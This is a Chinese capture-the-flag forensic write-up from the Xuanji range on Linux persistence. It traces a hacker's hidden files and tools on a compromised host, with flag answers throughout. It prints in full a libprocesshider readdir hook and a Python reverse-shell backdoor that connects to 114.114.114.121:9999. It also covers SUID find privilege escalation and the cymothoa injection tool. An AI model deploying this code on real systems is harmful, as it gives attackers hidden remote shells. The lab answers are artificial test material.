第三章 权限维持-linux权限维持-隐藏-玄机靶场
linux权限维持玄机靶场自用笔记。
本篇文章来自lexsd6's home 师傅的分享,如有侵权请联系
题目简介
1.黑客隐藏的隐藏的文件 完整路径md5
2.黑客隐藏的文件反弹shell的ip+端口 {ip:port}
3.黑客提权所用的命令 完整路径的md5 flag{md5}
4.黑客尝试注入恶意代码的工具完整路径md5
5.使用命令运行 ./x.xx 执行该文件 将查询的 Exec****** 值 作为flag提交 flag{/xxx/xxx/xxx}
1.黑客隐藏的隐藏的文件 完整路径md5
进入系统排查，发现 vim 的记录文件 .viminfo；读取它可以发现几个值得注意的路径：
Command Line History (newest to oldest):
:q!
:q
:wq
# Search String History (newest to oldest):
# Expression History (newest to oldest):
# Input Line History (newest to oldest):
# Input Line History (newest to oldest):
# Registers:
# File marks:
'0 1 0 /tmp/.temp/libprocesshider/1.py
'1 4 0 /tmp/.temp/libprocesshider/1.py
'2 12 40 /tmp/.temp/libprocesshider/processhider.c
'3 24 47 /tmp/.temp/libprocesshider/1.py
'4 2 1 /var/www/html/sh.php
libprocesshider 是一个 Linux 持久化/隐藏工具：它劫持 readdir 并过滤 /proc 中名为 1.py 的进程（见下方 processhider.c 中的 process_to_filter），1.py 就是被它隐藏的那个文件。对完整路径 /tmp/.temp/libprocesshider/1.py
计算 md5 后提交 flag{109ccb5768c70638e24fb46ee7957e37}
2.黑客隐藏的文件反弹shell的ip+端口 {ip:port}
进行分析/tmp/.temp/libprocesshider/
下的文件:
root@xuanji:~# cat /tmp/.temp/libprocesshider/processhider.c
#define _GNU_SOURCE
#include <stdio.h>
#include <dlfcn.h>
#include <dirent.h>
#include <string.h>
#include <unistd.h>
/*
 * Name of the process to hide: every /proc entry whose process name
 * (parsed from /proc/<pid>/stat by get_process_name) equals this string
 * is skipped by the hooked readdir below. This is the IoC for task 1.
 */
static const char* process_to_filter = "1.py";
/*
 * Resolve the path of an open DIR* by reading the /proc/self/fd/<fd> symlink.
 * buf receives the path (NUL-terminated by this function), size is its capacity.
 * Returns 1 on success, 0 if dirfd() or readlink() fails.
 * NOTE: readlink() does not NUL-terminate and may return exactly `size`;
 * in that case buf[ret] below writes one byte past the end of buf.
 */
static int get_dir_name(DIR* dirp, char* buf, size_t size)
{
    int fd = dirfd(dirp);
    if(fd == -1) {
        return 0;
    }
    char tmp[64];
    snprintf(tmp, sizeof(tmp), "/proc/self/fd/%d", fd);
    ssize_t ret = readlink(tmp, buf, size);   /* returns the length, no NUL */
    if(ret == -1) {
        return 0;
    }
    buf[ret] = 0;   /* out of bounds when ret == size (see note above) */
    return 1;
}
/*
 * Look up the name of a process from its /proc/<pid>/stat entry.
 * pid is the directory name as returned by readdir; non-numeric names
 * (such as "self") are rejected so only process entries are inspected.
 * On success buf receives the text between the first '(' and ')' of the
 * stat line and 1 is returned; 0 means pid was not numeric or the stat
 * file could not be opened or read.
 * NOTE: the sscanf() result is not checked, so buf may be left
 * uninitialised while 1 is still returned; "%[^)]" has no width limit,
 * so buf must be large enough for the name (callers pass 256 bytes).
 * The trailing 's' in the format string is a literal character, not a
 * conversion, and never matches because the next character is ')'.
 */
static int get_process_name(char* pid, char* buf)
{
    if(strspn(pid, "0123456789") != strlen(pid)) {
        return 0;   /* not a pid directory */
    }
    char tmp[256];
    snprintf(tmp, sizeof(tmp), "/proc/%s/stat", pid);
    FILE* f = fopen(tmp, "r");
    if(f == NULL) {
        return 0;
    }
    /* tmp is reused: first as the path, then as the first line of the stat file */
    if(fgets(tmp, sizeof(tmp), f) == NULL) {
        fclose(f);
        return 0;
    }
    fclose(f);
    int unused;
    sscanf(tmp, "%d (%[^)]s", &unused, buf);   /* pid, then the name in parentheses */
    return 1;
}
/*
 * Defines a hooked readdir (and, via the second instantiation, readdir64) that
 * wraps the real libc function resolved with dlsym(RTLD_NEXT). When the
 * directory being listed is /proc, entries whose process name equals
 * process_to_filter are silently skipped, so tools that enumerate /proc
 * through readdir (typically ps, ls /proc, ...) no longer see that process.
 * The hook can only interpose when this library is loaded ahead of libc,
 * presumably via LD_PRELOAD or /etc/ld.so.preload (not shown on this page);
 * those are the places an analyst should check for how it was loaded.
 * NOTE: if dlsym() fails the error is printed but original_readdir stays
 * NULL and is still called in the loop below (null function pointer call).
 */
#define DECLARE_READDIR(dirent, readdir) \
static struct dirent* (*original_##readdir)(DIR*) = NULL; \
\
struct dirent* readdir(DIR *dirp) \
{ \
    /* lazily resolve the libc function that sits behind this hook */ \
    if(original_##readdir == NULL) { \
        original_##readdir = dlsym(RTLD_NEXT, #readdir); \
        if(original_##readdir == NULL) \
        { \
            /* NOTE: only reports the failure; the NULL pointer is still used below */ \
            fprintf(stderr, "Error in dlsym: %s\n", dlerror()); \
        } \
    } \
\
    struct dirent* dir; \
\
    while(1) \
    { \
        dir = original_##readdir(dirp); \
        if(dir) { \
            char dir_name[256]; \
            char process_name[256]; \
            /* hide the entry: listing /proc and the entry's process name matches */ \
            if(get_dir_name(dirp, dir_name, sizeof(dir_name)) && \
               strcmp(dir_name, "/proc") == 0 && \
               get_process_name(dir->d_name, process_name) && \
               strcmp(process_name, process_to_filter) == 0) { \
                continue; \
            } \
        } \
        break; \
    } \
    return dir; \
}
/* Instantiate the hook for both the 64-bit and the classic readdir entry points. */
DECLARE_READDIR(dirent64, readdir64);
DECLARE_READDIR(dirent, readdir);
root@xuanji:~#
root@xuanji:~# cat /tmp/.temp/libprocesshider/1.py
#!/usr/bin/python3
# Reverse-shell backdoor recovered from /tmp/.temp/libprocesshider/1.py
# (the process hidden by processhider.c). For the analyst: it daemonises
# itself, then loops forever trying to connect to 114.114.114.121:9999 and,
# once connected, attaches an interactive /bin/bash to the socket. The
# hard-coded address/port is the IoC for task 2.
# NOTE: the original listing lost its indentation; it is restored here.
import socket,subprocess,os,sys, time
# First fork: the parent exits so the caller's shell gets control back.
pidrg = os.fork()
if pidrg > 0:
    sys.exit(0)
os.chdir("/")
os.setsid()   # start a new session, detaching from the controlling terminal
os.umask(0)
# Second fork: the usual double-fork daemonisation pattern; the session
# leader exits and only the grandchild keeps running.
drgpid = os.fork()
if drgpid > 0:
    sys.exit(0)
while 1:
    try:
        sys.stdout.flush()
        sys.stderr.flush()
        # silence the script's own stdout/stderr
        fdreg = open("/dev/null", "w")
        sys.stdout = fdreg
        sys.stderr = fdreg
        sdregs=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        sdregs.connect(("114.114.114.121",9999))   # C2 address and port (IoC)
        # wire the socket to fd 0/1/2 so the shell's I/O goes over the network
        os.dup2(sdregs.fileno(),0)
        os.dup2(sdregs.fileno(),1)
        os.dup2(sdregs.fileno(),2)
        p=subprocess.call(["/bin/bash","-i"])   # blocks until the shell exits; p is never used
        sdregs.close()
    except Exception:
        # any failure (e.g. connection refused/timeout) is swallowed ...
        pass
    # ... and the connection is retried every 2 s, which is why netstat on
    # the box shows several SYN_SENT entries towards 114.114.114.121:9999
    time.sleep(2)
root@xuanji:~#
在 1.py 中发现 sdregs.connect(("114.114.114.121",9999))，这就是反弹 shell 连接的目标 IP 和端口
，flag{114.114.114.121:9999}
3.黑客提权所用的命令
使用命令 find / -perm -u=s -type f 2>/dev/null 查询所有带 SUID 位的文件
，即 SUID 提权排查：
root@xuanji:/tmp/.temp/libprocesshider# find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/ping
/bin/ping6
/bin/su
/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/find
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/sudo
/usr/lib/eject/dmcrypt-get-device
列表中 mount、su、sudo、passwd 等默认就带 SUID 位，而 /usr/bin/find 正常情况下不应带 SUID 位；带 SUID 的 find 可以用来以属主权限执行命令从而提权，
故黑客提权所用的命令为 /usr/bin/find
对完整路径计算 md5 后提交 flag{7fd5884f493f4aaf96abee286ee04120}
4.黑客尝试注入恶意代码的工具
执行find / -name '.*'
查询隐藏文件。
/etc/.pwd.lock
/etc/cron.d/.placeholder
/etc/cron.daily/.placeholder
/etc/cron.hourly/.placeholder
/etc/cron.monthly/.placeholder
/etc/cron.weekly/.placeholder
/etc/init.d/.legacy-bootordering
/etc/skel/.bash_logout
/etc/skel/.bashrc
/etc/skel/.profile
/home/ctf/.bash_logout
/home/ctf/.bashrc
/home/ctf/.profile
/home/ctf/.bash_history
/opt/.cymothoa-1-beta
发现一个奇怪的目录/opt/.cymothoa-1-beta
,cd 进去发现是一个工具目录:
root@xuanji:/opt/.cymothoa-1-beta# ls
Makefile bgrep.c cymothoa cymothoa.h payloads personalization.h syscalls.txt udp_server.c
bgrep core cymothoa.c hexdump_to_cstring.pl payloads.h syscall_code.pl udp_server
查询资料可知 cymothoa 是一个向进程注入后门代码的工具，与题目中“注入恶意代码的工具”相符。
![image-20240708230421498](/Users/lexs/Library/Application Support/typora-user-images/image-20240708230421498.png)
故对完整路径 /opt/.cymothoa-1-beta/cymothoa
计算 md5 后提交 flag{087c267368ece4fcf422ff733b51aed9}
5.使用命令运行 ./x.xx 执行该文件 将查询的 Exec** 值 作为flag提交
用 cat 查看 1.py 的开头:
root@xuanji:/opt/.cymothoa-1-beta# cat /tmp/.temp/libprocesshider/1.py
#!/usr/bin/python3
import socket,subprocess,os,sys, time
发现其 shebang 为“#!/usr/bin/python3”，即 1.py 由 python3 解释执行。注意：1.py 运行后会两次 fork 成守护进程，并在 while 循环中每 2 秒重试连接 114.114.114.121:9999（对应下方 netstat 中多条 SYN_SENT 记录），只应在隔离的靶场环境中执行。
root@xuanji:~# python3 /tmp/.temp/libprocesshider/1.py
root@xuanji:~# netstat -alntp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 11/apache2
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 10/sshd
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 1 10.244.6.152:46896 114.114.114.121:9999 SYN_SENT 19439/python3
tcp 0 1 10.244.6.152:48628 114.114.114.121:9999 SYN_SENT -
tcp 0 0 10.244.6.152:22 10.244.0.1:63226 ESTABLISHED 393/1
tcp 0 1 10.244.6.152:48618 114.114.114.121:9999 SYN_SENT -
tcp 0 1 10.244.6.152:40544 114.114.114.121:9999 SYN_SENT -
tcp 0 0 10.244.6.152:22 10.244.0.1:4984 ESTABLISHED 9187/sshd: root@not
tcp6 0 0 :::22 :::* LISTEN 10/sshd
root@xuanji:~# whereis /python3
python3: /usr/bin/python3 /usr/bin/python3.4 /usr/bin/python3.4m /etc/python3 /etc/python3.4 /usr/lib/python3 /usr/lib/python3.4 /usr/local/lib/python3.4 /usr/share/python3 /usr/share/man/man1/python3.1.gz
root@xuanji:~#ls -lab /usr/bin/python3
lrwxrwxrwx. 1 root root 9 Mar 23 2014 /usr/bin/python3 -> python3.4
用 whereis 查询 python3 的位置，再用 ls -l 查看 /usr/bin/python3，发现它是指向 python3.4 的符号链接，即实际执行程序为 /usr/bin/python3.4
按题目要求提供完整的执行程序为flag :flag{/usr/bin/python3.4}